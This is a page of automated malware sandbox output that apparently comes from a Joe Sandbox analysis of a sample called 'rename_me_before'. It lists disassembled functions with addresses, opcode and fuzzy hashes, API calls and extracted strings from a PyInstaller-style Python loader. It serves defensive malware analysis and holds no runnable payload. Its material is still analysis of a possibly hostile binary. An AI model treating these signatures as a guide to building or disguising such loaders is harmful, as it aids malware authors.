                                                                                                                                                                                                                                                            • Instruction ID: cf07589b2d742e0f159bd812ff734021459defd5dd3c1882d2c8309a520b2f04
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A517036B1C661D6E725AB29C04023D77AAEBC5B58F254131CE4D97BB8CF3AE842D740
                                                                                                                                                                                                                                                            Function 00007FF6404F0A60 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                                            • Instruction ID: 99dd1c8235f2189647ba3b38af4aaf252857bb7f3fbef9220399fe4511cf4bb1
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93517E76A1D661D6E724BB29C04023937AAEB94B58F284131CF4D977A9DF3AE843C740
                                                                                                                                                                                                                                                            Function 00007FF6404F0E70 Relevance: .1, Instructions: 145COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                                            • Instruction ID: 4f6fa3933d20b37c1a36b9fabeeae5316ef1279ac7ee2b607117867212f70df7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 23518036A1CA61D6E734AB29C04063C37AAEB85F58F244131DF4D977A5CF7AE892C740
                                                                                                                                                                                                                                                            Function 00007FF6404F5040 Relevance: .1, Instructions: 138COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                            • Instruction ID: 73fbb83b5cc3c995eae67f19596c82819d7aecea7ccde522a6a4224d0e5e442d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D41C572D4D76BE8F955B91806147B4268AEF12BA0D6852B0DFA9D33C3CD0D7D878348
                                                                                                                                                                                                                                                            Function 00007FF6404F91B0 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                                                                            • Opcode ID: 8d7eb27f456b44a91f9c68f162ea9965681a4a0d7ad24d9c24e3bfc258020ebf
                                                                                                                                                                                                                                                            • Instruction ID: db0dd6b15e03006135c5e4bd97892dac167f4811191bba2d69ddf9dd56c481da
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8d7eb27f456b44a91f9c68f162ea9965681a4a0d7ad24d9c24e3bfc258020ebf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8C410372B18A6492EF48EF6ADA1416973A6FB4CFD4B099432DE0DD7B58DE3CD8418300
                                                                                                                                                                                                                                                            Function 00007FF6404F73F4 Relevance: .1, Instructions: 98COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 4baa1918ae36fbaba1f0c4c13332a4bc8c2fe618b431c1ec6b7f8f21172b3378
                                                                                                                                                                                                                                                            • Instruction ID: 6272f4aaa11853f9d5d8a92bf374c923dd941ac878541f69c8db8ac34755c4c0
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4baa1918ae36fbaba1f0c4c13332a4bc8c2fe618b431c1ec6b7f8f21172b3378
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 87319132B1CB9292E764BF25648013E7A9AAF84B90F144238EE9D97BD5DF3CD0029704
                                                                                                                                                                                                                                                            Function 00007FF640508880 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
                                                                                                                                                                                                                                                            • Instruction ID: 05e447ec61a57a95752b7e561440a4be7ef652e0940d6b2a075bc6ce40a1ed1d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8DF06271B1C2A59EDBA8FF29A90266977D0FB183C4F80943DE69DC3B04DA7C90608F04
                                                                                                                                                                                                                                                            Function 00007FF6404EC62C Relevance: .0, Instructions: 2COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
                                                                                                                                                                                                                                                            • Instruction ID: 06b182b58ba5db00e627f57bff0f8bf30ca06e1ede1175a8c7baab098e84c7f6
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95A0012592C836E0EA58BB14A99012A2220FB51705B401131D02D812A09F2CA8018350
                                                                                                                                                                                                                                                            Function 00007FF6404E50B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E50C0
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E5101
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E5126
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E514B
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E5173
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E519B
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E51C3
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E51EB
                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(?,00007FF6404E5C57,?,00007FF6404E308E), ref: 00007FF6404E5213
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: AddressProc
                                                                                                                                                                                                                                                            • String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
                                                                                                                                                                                                                                                            • API String ID: 190572456-2007157414
                                                                                                                                                                                                                                                            • Opcode ID: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                                                                            • Instruction ID: 749e0cb1e1f514267acb106d647e8661d968cbb92c6662e071f59433196bb520
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3c804ccaf4812c993b4970aca99c844c8aa25bcf6244ab31ff714926eb913965
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28129B6491EF23F1FA5DFB04AA542B827B0EF06758F945435D82E923A0EF7CB5488781
                                                                                                                                                                                                                                                            Function 00007FF6404E77D0 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 115COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E86B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6404E3FA4,00000000,00007FF6404E1925), ref: 00007FF6404E86E9
                                                                                                                                                                                                                                                            • ExpandEnvironmentStringsW.KERNEL32(?,00007FF6404E7C97,?,?,FFFFFFFF,00007FF6404E3834), ref: 00007FF6404E782C
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF6404E26C0: MessageBoxW.USER32 ref: 00007FF6404E2736
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                                            • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                                            • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                                            • Opcode ID: 9eab8ee9825a9fbd44869a095635737d99e10a8ea38952c2113d32bd4c9397e1
                                                                                                                                                                                                                                                            • Instruction ID: 506f906f73d081f3596a968a9d7fb226fe389954db74e8cd44959733c381078a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9eab8ee9825a9fbd44869a095635737d99e10a8ea38952c2113d32bd4c9397e1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: BA41F421B2C663F0FB64FB24E955ABA6261FFA4794F404031DA5EC2796EF7CE1048780
                                                                                                                                                                                                                                                            Function 00007FF6404E20F0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                                            • String ID: P%
                                                                                                                                                                                                                                                            • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                                            • Opcode ID: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                                                                                            • Instruction ID: 0bb270964456ae748b4171e7974fb360b430edc69f1fa457c445cd47c0f1082c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5dd136cfe9f7ccbcb0fe4cae99cf14dfe1cc9f89db7d8019ba122c6a34f6d98
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9F51E7266187B186D638AF22A4581BAB7A1F798B65F004121EBDE83785DF3CD145CB10
                                                                                                                                                                                                                                                            Function 00007FF6404F55A0 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 493COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: -$:$f$p$p
                                                                                                                                                                                                                                                            • API String ID: 3215553584-2013873522
                                                                                                                                                                                                                                                            • Opcode ID: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                                                                                            • Instruction ID: 6150a35bbfd0bdb68179f1490fd94ae10eb20f80981f7a2d76f33139792ec363
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 21cbc72c7e6dc269be11e21f83bf2085e3383c5e1ad4ae35147280bf7774980f
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2612C371E0C263E6FB24BA15E04467976ABFB40750F944136D79A87BC4DF7CE9908B08
                                                                                                                                                                                                                                                            Function 00007FF6404F02E8 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: f$f$p$p$f
                                                                                                                                                                                                                                                            • API String ID: 3215553584-1325933183
                                                                                                                                                                                                                                                            • Opcode ID: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                                                                                                            • Instruction ID: 82c57626d964c7d9075061fb34f581e1ae40eef3a7784c578c79fdee3959bacb
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1ce7302e2fd45bb0c0c54093c0ec2c5d292275181cf657796836d36714c503ba
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35128F62E0C163E6FB24BA54E0546BA729BFBD0754F884132E799C67C4DF7CE8908B50
                                                                                                                                                                                                                                                            Function 00007FF6404E1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 111COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1983679219.00007FF6404E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6404E0000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983626811.00007FF6404E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983720990.00007FF64050B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF64051E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983759772.00007FF640524000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1983825892.00007FF640526000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff6404e0000_rename_me_before.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message
